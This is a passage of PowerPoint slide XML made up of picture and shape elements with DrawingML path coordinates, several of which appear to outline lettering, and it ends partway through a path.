              <a:ext cx="198365" cy="149700"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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F98D59E9-5F06-63D9-4F00-07568355D42F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7258608" y="3845517"/>
              <a:ext cx="229235" cy="240665"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="229234" h="240664">
                  <a:moveTo>
                    <a:pt x="158995" y="3024"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="171109" y="7560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186251" y="12097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198365" y="16633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204422" y="19657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208965" y="22681"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215022" y="25706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219564" y="30242"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222593" y="34778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225621" y="39315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227136" y="45363"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228650" y="49900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228650" y="55948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227136" y="63509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219564" y="87703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211993" y="114921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202908" y="142139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196851" y="155749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190794" y="169358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184737" y="182967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177166" y="193552"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169595" y="205649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162023" y="214722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152938" y="223794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146881" y="226819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143852" y="231355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137795" y="232867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131738" y="235891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127196" y="237403"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121139" y="238916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="116596" y="238916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112053" y="240428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="102968" y="238916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93882" y="235891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84797" y="232867"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75712" y="229843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66626" y="225306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="51484" y="219258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45427" y="216234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39370" y="213209"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34827" y="210185"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30284" y="205649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25742" y="201112"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21199" y="196576"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18170" y="192040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13628" y="185991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10599" y="179943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7571" y="173894"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4542" y="167846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3028" y="161797"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1514" y="154236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="148188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="140627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="133067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="120970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1514" y="110385"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4542" y="98288"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7571" y="87703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13628" y="77118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18170" y="66533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24227" y="57460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="31799" y="46875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="39370" y="39315"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="48455" y="31754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57541" y="24194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68140" y="18145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78740" y="12097"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="89340" y="7560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99939" y="3024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112053" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124167" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136281" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="146881" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="158995" y="3024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9" name="object 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{702AF519-231A-8B4D-EB5B-81F5C96F1D02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0092" y="3703378"/>
              <a:ext cx="139310" cy="193552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50" name="object 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4068AD49-C7D8-8CF9-0155-39F87A61C0D0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51036" y="3693597"/>
              <a:ext cx="278620" cy="400050"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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FD7C36AA-4C86-209B-C14A-78401D296AC4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7092054" y="4695475"/>
              <a:ext cx="713105" cy="96520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="23307" y="4066"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="4066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23307" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23307" y="54617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81036" y="54617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81036" y="37138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23307" y="37138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23307" y="4066"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="81036" y="54617"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57729" y="54617"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57729" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81036" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81036" y="54617"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="81036" y="4066"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="57729" y="4066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57729" y="37138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81036" y="37138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81036" y="4066"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="168640" y="39325"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="135149" y="39325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="139680" y="40042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145817" y="42915"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147361" y="45514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147361" y="49641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140920" y="50005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="134722" y="50572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100869" y="69910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100925" y="81249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="103063" y="86235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112001" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112296" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117227" y="96249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126432" y="96249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128972" y="96015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147239" y="87206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="87206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="81440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131918" y="81440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129906" y="81249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127305" y="80483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126208" y="79887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125273" y="79081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124298" y="78274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123688" y="77429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123201" y="75653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123079" y="70955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123668" y="69231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147239" y="62445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="62445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="40042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168640" y="39325"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="168901" y="87206"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147239" y="87206"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147239" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="87206"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="168901" y="62445"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="147239" y="62445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147239" y="76602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="145532" y="78052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143561" y="79223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138767" y="81117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138471" y="81117"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136856" y="81440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="81440"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168901" y="62445"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="133706" y="24335"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="128484" y="24335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123282" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112878" y="26407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="109119" y="27127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106823" y="27732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106823" y="44179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108814" y="44179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110602" y="43490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113528" y="42511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121456" y="40042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121226" y="40042"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125558" y="39325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168640" y="39325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166137" y="33893"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160610" y="30069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155829" y="27560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149749" y="25768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142758" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143728" y="24749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="133706" y="24335"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="230958" y="24396"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="221144" y="24396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216145" y="25062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186498" y="54274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186598" y="67179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215596" y="95540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221042" y="96249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231507" y="96249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235652" y="95773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243130" y="93871"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246385" y="92709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="90968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="80651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221713" y="80651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="217161" y="78953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210740" y="72156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209135" y="67179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209135" y="54274"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="210699" y="49247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="216958" y="41842"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221449" y="39991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="39991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="29858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246768" y="28238"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243110" y="26923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235246" y="24902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230958" y="24396"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="250161" y="72338"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="247072" y="72338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246178" y="73188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245223" y="74057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230369" y="80651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="80651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="72338"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="250161" y="39991"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="229881" y="39991"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232178" y="40286"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236140" y="41458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247072" y="48487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="48487"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="250161" y="39991"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="288708" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="266783" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266783" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288708" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288708" y="72056"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294601" y="64792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319074" y="64792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313346" y="56324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288708" y="56324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288708" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="319074" y="64792"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="294601" y="64792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313702" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339123" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319074" y="64792"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="337375" y="26277"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="312178" y="26277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288708" y="56324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="313346" y="56324"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312889" y="55650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337375" y="26277"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="386408" y="24152"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="350278" y="45628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347698" y="60746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="348380" y="68783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372131" y="94024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372323" y="94024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380387" y="95672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390045" y="96249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395349" y="96249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400185" y="95804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="408922" y="94024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413576" y="92587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418514" y="90604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418514" y="80895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="385128" y="80895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="379621" y="79479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="372143" y="73814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370111" y="69727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369786" y="64387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419794" y="64387"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419794" y="56741"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419511" y="52749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419429" y="51584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369725" y="51584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370034" y="47012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370050" y="46768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371554" y="43269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="376906" y="38959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="380434" y="37807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415345" y="37807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415070" y="37221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="411401" y="32558"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="406708" y="28880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400977" y="26253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="394601" y="24768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="395563" y="24768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386408" y="24152"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="418514" y="73066"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="416075" y="73066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="413576" y="74968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="410162" y="76748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="401506" y="80064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397035" y="80895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418514" y="80895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418514" y="73066"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="415345" y="37807"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="389171" y="37807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="392524" y="38959"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="396812" y="43571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397850" y="46768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397929" y="47012"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="398051" y="51584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419429" y="51584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="419268" y="49312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417879" y="43571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417805" y="43269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="417693" y="42805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="415345" y="37807"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="459601" y="26277"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="437696" y="26277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="437696" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459601" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459601" y="48792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="462344" y="47820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464904" y="47132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="469659" y="46323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487094" y="46323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487094" y="36289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459601" y="36289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459601" y="26277"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="487094" y="46323"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="480147" y="46323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="482725" y="46526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="484229" y="46768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="485258" y="47132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487094" y="47132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487094" y="46323"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="487094" y="26277"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="477770" y="26277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="475674" y="26712"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="468582" y="29423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="464396" y="32164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="459601" y="36289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487094" y="36289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="487094" y="26277"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="713104" h="96520">
                  <a:moveTo>
                    <a:pt x="590422" y="4066"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="546327" y="4066"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546327" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569614" y="94428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569614" y="64995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="590727" y="64995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617503" y="47942"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569614" y="47942"/>
